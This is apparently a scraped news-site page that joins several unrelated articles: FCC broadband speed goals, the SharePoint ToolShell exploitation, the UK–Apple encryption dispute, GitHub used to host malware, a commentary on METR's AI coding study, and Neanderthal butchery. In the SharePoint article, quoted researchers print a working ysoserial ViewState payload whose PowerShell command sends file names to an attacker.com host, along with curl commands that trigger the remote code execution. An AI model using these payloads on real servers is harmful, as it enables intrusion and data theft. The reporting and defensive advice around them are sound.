“As part of our return to following the plain language of section 706, we propose to abolish without replacement the long-term goal of 1,000/500Mbps established in the 2024 Report,” Carr’s plan said. “Not only is a long-term goal not mentioned in section 706, but maintaining such a goal risks skewing the market by unnecessarily potentially picking technological winners and losers.”

Fiber networks can already meet a 1,000/500Mbps standard, and the Biden administration generally prioritized fiber when it came to distributing grants to Internet providers. The Trump administration changed grant-giving procedures to distribute more funds to non-fiber providers such as Elon Musk’s Starlink satellite network.

Carr’s proposal alleged that the 1,000/500Mbps long-term goal would “appear to violate our obligation to conduct our analysis in a technologically neutral manner,” as it “may be unreasonably prejudicial to technologies such as satellite and fixed wireless that presently do not support such speeds.”

100/20Mbps standard appears to survive

When the 100/20Mbps standard was adopted last year, Carr alleged that “the 100/20Mbps requirement appears to be part and parcel of the Commission’s broader attempt to circumvent the statutory requirement of technological neutrality.” It appears the Carr FCC will nonetheless stick with 100/20Mbps for measuring availability of fixed broadband. But his plan would seek comment on that approach, suggesting a possibility that it could be changed.

“We propose to again focus our service availability discussion on fixed broadband at speeds of 100/20Mbps and seek comment on this proposal,” the plan said.

If any regulatory changes are spurred by Carr’s deployment inquiry, they would likely be to eliminate regulations instead of adding them. Carr has been pushing a “Delete, Delete, Delete” initiative to eliminate rules that he considers unnecessary, and his proposal asks for comment on broadband regulations that could be removed.

“Are there currently any regulatory barriers impeding broadband deployment, investment, expansion, competition, and technological innovation that the Commission should consider eliminating?” the call for comment asks.

FCC to eliminate gigabit speed goal and scrap analysis of broadband prices Read More »

sharepoint-vulnerability-with-9.8-severity-rating-under-exploit-across-globe

SharePoint vulnerability with 9.8 severity rating under exploit across globe

The researchers wrote:

Now, with the ToolShell chain (CVE-2025-49706 + CVE-2025-49704), attackers appear to extract the ValidationKey directly from memory or configuration. Once this cryptographic material is leaked, the attacker can craft fully valid, signed __VIEWSTATE payloads using a tool called ysoserial as shown in the example below.

Using ysoserial, the attacker can generate their own valid SharePoint tokens for RCE.

# Command to get the __VIEWSTATEGENERATOR via any publicly available SharePoint page, like start.aspx
curl -s https://target.com/_layouts/15/start.aspx | grep -oP '__VIEWSTATEGENERATOR" value="\K[^"]+'

# Example malicious PowerShell viewstate payload that the adversary can utilize as RCE to list a dir
ysoserial.exe -p ViewState -g TypeConfuseDelegate \
  -c "powershell -nop -c \"dir 'C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\15\TEMPLATE\LAYOUTS' | % { Invoke-WebRequest -Uri ('http://attacker.com/?f=' + [uri]::EscapeDataString($_.Name)) }\"" \
  --generator="" \
  --validationkey="" \
  --validationalg="" \
  --islegacy \
  --minify

# Finally, by adding the generated token to any request, the command is executed (RCE)
curl http://target/_layouts/15/success.aspx?__VIEWSTATE=

These payloads can embed any malicious commands and are accepted by the server as trusted input, completing the RCE chain without requiring credentials. This mirrors the design weakness exploited in 2021, but now packaged into a modern zero-day chain with automatic shell drop, full persistence, and zero authentication.
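The core failure is easy to see in miniature. The sketch below is a simplified conceptual model, not ASP.NET’s actual ViewState format or MAC algorithm: a server that trusts any payload carrying a valid HMAC under its secret key has no defense once that key leaks, because the attacker can then mint signatures the server cannot distinguish from its own.

```python
import hmac
import hashlib
import base64

# Hypothetical leaked secret, standing in for the SharePoint ValidationKey.
validation_key = b"secret-machine-key"

def sign(payload: bytes, key: bytes) -> bytes:
    """Append an HMAC-SHA256 tag to the payload and base64-encode the result."""
    mac = hmac.new(key, payload, hashlib.sha256).digest()
    return base64.b64encode(payload + mac)

def server_accepts(token: bytes, key: bytes) -> bool:
    """Server-side check: accept any token whose MAC verifies under the key."""
    raw = base64.b64decode(token)
    payload, mac = raw[:-32], raw[-32:]   # SHA-256 digest is 32 bytes
    return hmac.compare_digest(mac, hmac.new(key, payload, hashlib.sha256).digest())

# Once the key leaks, the attacker signs arbitrary (e.g. serialized) payloads,
# and the server treats them as trusted input.
forged = sign(b"malicious-serialized-object", validation_key)
print(server_accepts(forged, validation_key))  # True
```

In the real attack, the “payload” is a malicious serialized .NET object, which is why a valid signature translates directly into code execution.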

Patching is only the start

The attackers are using the capability to steal SharePoint ASP.NET machine keys, which would allow them to stage attacks on additional infrastructure later. That means patching alone provides no assurance that attackers have been driven out of a compromised system. Instead, affected organizations must rotate their SharePoint ASP.NET machine keys and restart the IIS web server running on top.

According to The Washington Post, at least two federal agencies have found that servers inside their networks were breached in the ongoing attacks.

The Eye Security post provides technical indicators that admins can use to determine if their systems have been targeted in the attacks. It also provides a variety of measures vulnerable organizations can take to harden their systems against the activity.

In a post on Sunday, the US Cybersecurity and Infrastructure Security Agency confirmed the attacks and their use of ToolShell. The post went on to provide its own list of security measures.

SharePoint vulnerability with 9.8 severity rating under exploit across globe Read More »

uk-backing-down-on-apple-encryption-backdoor-after-pressure-from-us

UK backing down on Apple encryption backdoor after pressure from US

Under the terms of the legislation, recipients of such a notice are unable to discuss the matter publicly, even with customers affected by the order, unless granted permission by the Home Secretary.

The legislation’s use against Apple has triggered the tech industry’s highest-profile battle over encryption technology in almost a decade.

In response to the demand, Apple withdrew its most secure cloud storage service from the UK in February and is now challenging the Home Office’s order at the Investigatory Powers Tribunal, which probes complaints against the UK’s security services.

Last month, Meta-owned WhatsApp said it would join Apple’s legal challenge, in a rare collaboration between the Silicon Valley rivals.

In the meantime, the Home Office continues to pursue its case with Apple at the tribunal.

Its lawyers discussed the next legal steps this month, reflecting the divisions within government over how best to proceed. “At this point, the government has not backed down,” said one person familiar with the legal process.

A third senior British official added that the UK government was reluctant to push “anything that looks to the US vice-president like a free-speech issue.”

In a combative speech at the Munich Security Conference in February, Vance argued that free speech and democracy were threatened by European elites.

The UK official added that this “limits what we’re able to do in the future, particularly in relation to AI regulation.” The Labour government has delayed plans for AI legislation until after May next year.

Trump has also been critical of the UK stance on encryption.

The US president has likened the UK’s order to Apple to “something… that you hear about with China,” saying in February that he had told Starmer: “You can’t do this.”

US Director of National Intelligence Tulsi Gabbard has also suggested the order would be an “egregious violation” of Americans’ privacy that risked breaching the two countries’ data agreement.

Apple did not respond to a request for comment. “We have never built a back door or master key to any of our products, and we never will,” Apple said in February.

The UK government did not respond to a request for comment.

A spokesperson for Vance declined to comment.

The Home Office has previously said the UK has “robust safeguards and independent oversight to protect privacy” and that these powers “are only used on an exceptional basis, in relation to the most serious crimes.”

© 2025 The Financial Times Ltd. All rights reserved. Not to be redistributed, copied, or modified in any way.

UK backing down on Apple encryption backdoor after pressure from US Read More »

github-abused-to-distribute-payloads-on-behalf-of-malware-as-a-service

GitHub abused to distribute payloads on behalf of malware-as-a-service

Researchers from Cisco’s Talos security team have uncovered a malware-as-a-service operator that used public GitHub accounts as a channel for distributing an assortment of malicious software to targets.

The use of GitHub gave the malware-as-a-service (MaaS) a reliable and easy-to-use platform that’s greenlit in many enterprise networks that rely on the code repository for the software they develop. GitHub removed the three accounts that hosted the malicious payloads shortly after being notified by Talos.

“In addition to being an easy means of file hosting, downloading files from a GitHub repository may bypass Web filtering that is not configured to block the GitHub domain,” Talos researchers Chris Neal and Craig Jackson wrote Thursday. “While some organizations can block GitHub in their environment to curb the use of open-source offensive tooling and other malware, many organizations with software development teams require GitHub access in some capacity. In these environments, a malicious GitHub download may be difficult to differentiate from regular web traffic.”

Emmenhtal, meet Amadey

The campaign, which Talos said had been ongoing since February, used a previously known malware loader tracked under names including Emmenhtal and PeakLight. Researchers from security firm Palo Alto Networks and Ukraine’s major state cyber agency SSSCIP had already documented the use of Emmenhtal in a separate campaign that embedded the loader into malicious emails to distribute malware to Ukrainian entities. Talos found the same Emmenhtal variant in the MaaS operation, only this time the loader was distributed through GitHub.

The campaign using GitHub differed from the one targeting Ukrainian entities in another key way. Whereas the final payload in the Ukrainian campaign was a malicious backdoor known as SmokeLoader, the GitHub one installed Amadey, a separate, previously known malware platform. Amadey was first seen in 2018 and was initially used to assemble botnets. Talos said Amadey’s primary function is to collect system information from infected devices and download a set of secondary payloads customized to each device’s individual characteristics, based on the specific purpose of different campaigns.

GitHub abused to distribute payloads on behalf of malware-as-a-service Read More »

on-metr’s-ai-coding-rct

On METR’s AI Coding RCT

METR ran a proper RCT experiment seeing how much access to Cursor (using Sonnet 3.7) would accelerate coders working on their own open source repos.

Everyone surveyed expected a substantial speedup. The developers thought they were being substantially sped up.

Instead, it turned out that using Cursor slowed them down.

That surprised everyone, raising the question of why.

Currently our best guess is this comes down to a combination of two factors:

  1. Deeply understood open source repos are close to a worst-case scenario for AI tools, because they require bespoke outputs in various ways and the coder has lots of detailed local knowledge of the codebase that the AI lacks.

  2. The coders in question mostly did not have experience with similar AI tools. The lack of observed improvement during the experiment cuts against this explanation, but the tools very clearly have a steep learning curve, just as other programming tools do.

Thus we should be careful interpreting the result. It was still highly virtuous to run an RCT, and to publish the results even when they were against interest and counterintuitive, and at risk of being quoted endlessly in misleading fashion by AI skeptics. That is how real science works.

In this case the haters were right, honestly great call by the haters (paper here, blog post here), at least on the headline result.

Again, due to all the circumstances, one should avoid inferring too much. I would like to see the study done again where everyone had at least a few weeks of working full time with such tools, ideally also while working on other types of projects. And a result this surprising means we should be on the lookout for flaws.

The result was still very much surprising to METR, to the developers in the test, to the forecasters, and also to those who saw the results.

Yo Shavit: something something METR good bc publishing against their priors blah blah

all I care about is that this vindicates my incompetence in using models for my actual work

Dwarkesh Patel: Surely this doesn’t have implications for how I use AI and whether I’m fooling myself about how much more effective it’s making my podcast prep, right? 😅

METR: We ran a randomized controlled trial to see how much AI coding tools speed up experienced open-source developers.

The results surprised us: Developers thought they were 20% faster with AI tools, but they were actually 19% slower when they had access to AI than when they didn’t.

We recruited 16 experienced open-source developers to work on 246 real tasks in their own repositories (avg 22k+ stars, 1M+ lines of code).

We randomly assigned each task to either allow AI (typically Cursor Pro w/ Claude 3.5/3.7) or disallow AI help.

At the beginning of the study, developers forecasted that they would get sped up by 24%. After actually doing the work, they estimated that they had been sped up by 20%. But it turned out that they were actually slowed down by 19%.

We were surprised by this, given a) impressive AI benchmark scores, b) widespread adoption of AI tooling for software development, and c) our own recent research measuring trends in the length of tasks that agents are able to complete.

When AI is allowed, developers spend less time actively coding and searching for information, and instead spend time prompting AI, waiting on/reviewing AI outputs, and idle. We find no single reason for the slowdown—it’s driven by a combination of factors.

To better understand these factors, we investigate 20 properties of our setting, finding 5 likely contributors, and 8 mixed/unclear factors.

We also analyze to make sure the result isn’t a fluke, and find that slowdown persists across different outcome measures, estimator methodologies, and many other subsets/analyses of our data.
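The gap between perception and measurement is easier to feel with concrete numbers. Here is some illustrative arithmetic (my framing of the reported percentages, not METR’s actual estimator), using a hypothetical task that takes 100 minutes without AI:

```python
# Illustrative arithmetic: turn the reported percentages into time estimates
# for a hypothetical 100-minute task.
baseline = 100.0                      # minutes without AI (hypothetical)

forecast_speedup = 0.24               # devs forecast: 24% faster with AI
perceived_speedup = 0.20              # devs' post-hoc estimate: 20% faster
actual_slowdown = 0.19                # measured: 19% slower with AI

expected_time = baseline / (1 + forecast_speedup)    # what they forecast
perceived_time = baseline / (1 + perceived_speedup)  # what they felt
actual_time = baseline * (1 + actual_slowdown)       # what was measured

print(round(expected_time, 1), round(perceived_time, 1), round(actual_time, 1))
```

Under this framing, developers expected the task to take about 81 minutes with AI, believed afterward it had taken about 83, and were measured at 119, a swing of more than half an hour between self-report and reality.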

What do we take away?

1. It seems likely that for some important settings, recent AI tooling has not increased productivity (and may in fact decrease it).

2. Self-reports of speedup are unreliable—to understand AI’s impact on productivity, we need experiments in the wild.

Another implication:

It is sometimes proposed that we should monitor AI R&D acceleration inside of frontier AI labs via simple employee surveys. We’re now more pessimistic about these, given how large of a gap we observe between developer-estimated and observed speed-up.

What we’re NOT saying:

1. Our setting represents all (or potentially even most) software engineering.

2. Future models won’t be better (or current models can’t be used more effectively).

David Rein: I was pretty skeptical that this study was worth running, because I thought that *obviously* we would see significant speedup.

Charles Foster: Before you say “this isn’t surprising”…

Yes, it is. We got people to preregister their expectations, and even folks who are extremely in-the-know about AI coding abilities still failed to predict this result.

Your *vibes* are not reliable indicators of productivity effects.

Jeffrey Ladish: Surprising results from METR re AI software engineer uplift! Great to see this kind of empirical investigation. Our intuitions are not always correct…

I do think this is to some extent a skill issue. Pretty sure I know some people who’ve learned to use the tools effectively and get a big speed and quality boost.

Daniel Kokotajlo: Very important work! This also has lengthened my timelines somewhat, for obvious reasons. 🙂

In perhaps the most shocking fact of all, developers actually slightly overestimated their required time in the non-AI scenario. I thought that was never how any of this worked?

So now that we have the result, in addition to updating in general, what explains why this situation went unusually poorly?

Here are the paper’s own theories first:

The big disagreement is over the first factor here, as to whether the development environment and associated AI tools should count as familiar in context.

There are several factors that made this situation unusually AI-unfriendly.

AI coding is at its best when it is helping you deal with the unfamiliar, compensating for a lack of skill, and when it can be given free rein, or when you can see what it can do and adapt the task to the tool. None of those applied here.

Roon: IME really good software ppl who deeply care find the least use from LLM coding and are often ideologically opposed to it because they like to exert editorial control over every line. slop research coders such as myself don’t care as much and have much larger gains.

this result is still surprising, how/why does it slow them down? but I wouldn’t think it generalizes to the average software developer who’s just trying to get some damn thing done and not trying to write maintainable useful code on a top open source library.

Eric Raymond: I think I qualify as an experienced open source developer, and that study looks completely ridiculous to me.

I’ve discussed it with some peers. We think one of the confounders may be that LLMs are much better at accelerating green-field development than at fixing or improving large existing codebases.

Also there’s a difference in their performance between front-end and back-end stuff. Big advantage for web front-end dev, not so much for back-end. I’ve experienced this difference myself.

Or as Joel Becker says, “our setting was weird.”

Steve Newman has an excellent analysis of many aspects of this question.

  1. These were projects that the developers already knew intimately, with high context, and they did the task they would otherwise have done next. They were already familiar with the repos, were working at a very high skill level, and were trying to adapt the tool to the task rather than the task to the tool.

    1. In particular, they broke down tasks into 1-2 hour chunks before they knew whether they could use AI for the subtasks. That’s great RCT design, but does mean flexibility was limited.

  2. These were large open source projects that thus have a variety of high standards and requirements, and require a lot of tacit knowledge and context. AI code that is “good enough” in other contexts wasn’t up to standards here, and this was identified as the biggest factor; only 39% of Cursor generations were accepted, and many of those still required reworking.

  3. Pay was by the hour, so there was a large temptation to let the AI cook and otherwise work not so efficiently. From Ruby we get the reminder that a natural thing to do when working in Cursor is to end up checking social media while it runs.

  4. They certainly weren’t doing AI coder multitasking or anything like that.

  5. As always, there is a lag, this was done with Sonnet 3.5/3.7. Ruby notes that the models we have now are already substantially better.

  6. The tasks were modestly beyond the range of tasks Sonnet 3.7 can do autonomously, as per METR’s own measurements (plus the contractor vs. maintainer contrast).

  7. The AI tools offered were often new to their users, which slows people down. Participants might have been partly learning AI tools on METR’s dime? Developers said they weren’t significantly inconvenienced by the tool changes but you can’t trust self-reports.

  8. Some participants seem to have gone a bit overboard with AI usage as part of the experiment?

We also have a direct post mortem from Quentin Anthony, who was one of the 16 devs and experienced a 38% speedup when using AI, the best result of all participants. He ascribes others getting poor results in large part to:

  1. Falling into the failure mode of pressing the magic bullet AI button hoping the problem gets solved, which is not a good workflow, rather than AI as a tool.

  2. Getting distracted during downtime as they wait for AI, also not a good workflow.

  3. AIs running into various problems where they perform poorly.

All of that is true, but none of it seems like enough to explain the result.

By far the strongest counterargument to the study is to claim the users simply lacked the required experience using this form of AI, so of course they struggled.

Credit to Emmett Shear for being the first one to prominently lay this out fully.

Emmett Shear: METR’s analysis of this experiment is wildly misleading. The results indicate that people who have ~never used AI tools before are less productive while learning to use the tools, and say ~nothing about experienced AI tool users. Let’s take a look at why.

I immediately found the claim suspect because it didn’t jibe with my own experience working w people using coding assistants, but sometimes there are surprising results so I dug in. The first question: who were these developers in the study getting such poor results?

They claim “a range of experience using AI tools”, yet only a single developer of their sixteen had more than a single week of experience using Cursor. They make it look like a range by breaking “less than a week” into <1 hr, 1-10hrs, 10-30hrs, and 30-50hrs of experience.

Given the long steep learning curve for effectively using these new AI tools well, this division betrays what I hope is just grossly negligent ignorance about that reality, rather than intentional deception.

Of course, the one developer who did have more than a week of experience was 20% faster instead of 20% slower.

David Rein: Devs had roughly the following prior LLM experience:

– 7/16 had >100s of hours

– 7/16 had 10-100 hours

– 2/16 had 1-10 hours

We think describing this as “moderate AI experience” is fair, my guess is we’ll have to agree to disagree, but appreciate the feedback!

Emmett Shear: I think conflating the two completely invalidates the study’s headline and summary results. I suppose the future will tell if this is the case. I’m glad to have found the underlying disagreement.

It is clear that the source of disagreement is that I think using Cursor effectively is a distinct skill from talking to ChatGPT while you program and expect fairly low transfer, and the authors think it’s a similar skill and expect much higher transfer.

I think Emmett is right that these tools are not similar. The data point that still needs to be explained is (see Table 1 above) the lack of improvement over those 30-50 hours using Cursor. If the learning curve is steep then devs should be improving rapidly over that time. So I can still definitely see this going either way.

Regardless, this was an unusually hostile setting on many fronts, including the lack of experience. The result is still important in general.

Roon: am curious about a few things. the archetype of an “experienced open source developer” is very different from your average developer. is there a subset of inexperienced developers? developers who work for random companies but are not enthusiasts?

David Rein: yeah the open-source repos do typically have pretty high standards for linting, test coverage, etc.—not all of which is super clear in contributing guidelines necessarily (making it harder for AI to help)

Minh Nhat Nguyen: I would critique the “their own repos” part. By far the biggest unlock I have when using AI coding is navigating unfamiliar repos.

After some iteration, even if an AI made the initial draft, I’d be faster working myself on repos I already know well.

David Rein: One of the most confusing aspects of the result is that we don’t *require* developers to use AI, they’re just *allowed* to use it. So in principle, they should be able to just not use AI if it’s slowing them down.

There are two main explanations we have for this.

The first is that developers think that AI is speeding them up (they estimate they were sped up by 20%).

The second is that developers might be trading some speed for ease—using Cursor may be so much more pleasant that developers don’t notice or mind that they’re slowed down.

One common question is how much experience the developers have with AI tools—maybe they’re just particularly bad at using AI? While they weren’t AI power users before the study, nearly all have tens to hundreds of hours of prior experience using LLMs.

44% of the developers had used Cursor before, and for ~19% of them it was already their primary IDE. Furthermore, throughout the study, they spend around 20 hours on issues where they’re allowed to use AI tools—and we don’t see speedup when excluding up to their first 8 tasks with AI.

We further rule out a bunch of potential experimental artifacts: we don’t have dropout/attrition issues, the results are robust to variations of our outcome estimation methodology, developers primarily use frontier models (at the time), and we don’t see cheating.

Some other interesting findings! We find that developers are slowed down less on tasks they are less familiar with. This is intuitive—if you really know what you’re doing, AI has less marginal value. Because we collect forecasts from developers on how long they expect issues to take both with and without AI, we can measure their speedup as a function of how much speedup they expect for particular issues. Developers are actually somewhat calibrated on AI’s usefulness!

Just for fun, here are the repositories developers were working on in the study—they’re pretty impressive! I was really impressed by the general skill of the developers—they’re really experienced, and they contribute to large, complex projects.

Another takeaway worth noting is that self-reports of coding productivity, or of productivity gains from AI, cannot be trusted in general. Peter’s thread on this is excellent.

Peter Wildeford: I definitely think the biggest takeaway from this paper is that we likely can’t trust self-reports. This is pretty surprising to me, but is a finding commonly seen in productivity literature.

The March @METR_Evals paper contained this nugget about contractors being much slower [5x-18x slower to fix issues!] than maintainers. This seems borne out today, as the new study on AI slowdown was solely on maintainers – METR studied 16 long-time maintainers with an average of 5 yrs prior work on the repo

Seems important to keep in mind for AI timelines when interpreting the prior METR paper on task horizon length that the comparison was AI to contractors. A comparison of AI to veteran SWEs likely would have been tougher. I guess humans have returns to experience!

This does make me strongly suspect the METR paper on AI productivity slowdown would’ve gone differently if it was measuring junior engineers or senior engineers in new projects, as opposed to where there’s significant pre-existing fit with the exact work. My hypothesis is that the results in this paper are real, but don’t apply to a wide variety of scenarios where AIs do speed people up.

I am somewhat convinced by Emmett Shear’s explanation. I strongly agree that ‘experience with LLMs’ does not translate cleanly to ‘experience with Cursor’ or with AI coding tools, although experience with other AI IDEs would fully count. And yes, there is a rather steep learning curve.

So I wouldn’t get too excited by all this until we try replication with a group that has a lot more direct experience. It should not be too hard to find such a group.

Certainly I still think AI is a vast productivity enhancer for most coders, and that Opus 4 (or your preferred alternative) is a substantial upgrade over Sonnet 3.7. Also Claude Code seems to be the core of the optimal stack at this point, with Cursor as a secondary tool. This didn’t change my estimates of the ‘normal case’ by that much.

I still think this is a meaningful update. The result was very different than people expected, and participants did not seem to be moving up the learning curve.




Local cuisine was on the menu at Cafe Neanderthal

Gazelle prepared “a la Amud,” or “a la Kebara”?

Neanderthals at Kebara had pretty broad tastes in meat. The butchered bones found in the cave were mostly an even mix of small ungulates (largely gazelle) and medium-sized ones (red deer, fallow deer, wild goats, and boar), with just a few larger game animals thrown in. And it looks like the Kebara Neanderthals were “use the whole deer” sorts of hunters because the bones came from all parts of the animals’ bodies.

On the other hand (or hoof), at Amud, archaeologists found that the butchered bones were almost entirely long bone shafts—legs, in other words—from gazelle. Apparently, the Neanderthal hunters at Amud focused more on gazelle than on larger prey like red deer or boar, and they seemingly preferred meat from the legs.

And not too fresh, apparently—the bones at Kebara showed fewer cut marks, and the marks that were there tended to be straighter. Meanwhile, at Amud, the bones were practically cluttered with cut marks, which crisscrossed over each other and were often curved, not straight. According to Jallon and her colleagues, the difference probably wasn’t a skill issue. Instead, it may be a clue that Neanderthals at Amud liked their meat dried, boiled, or even slightly rotten.

That’s based on comparisons to what bones look like when modern hunter-gatherers butcher their game, along with archaeologists’ experiments with stone tool butchery. First, differences in skill between newbie butchers and advanced ones don’t produce the same pattern of cut marks Jallon and her colleagues saw at Amud. But “it has been shown that decaying carcasses tend to be more difficult to process, often resulting in the production of haphazard, deep, and sinuous cut marks,” as Jallon and her colleagues wrote in their recent paper.

So apparently, for reasons unknown to modern archaeologists, the meat on the menu at Amud was, shall we say, a bit less fresh than that at Kebara. Said menu was also considerably less varied. All of that meant that if you were a Neanderthal from Amud and stopped by Kebara for dinner (or vice versa), your meal might seem surprisingly foreign.
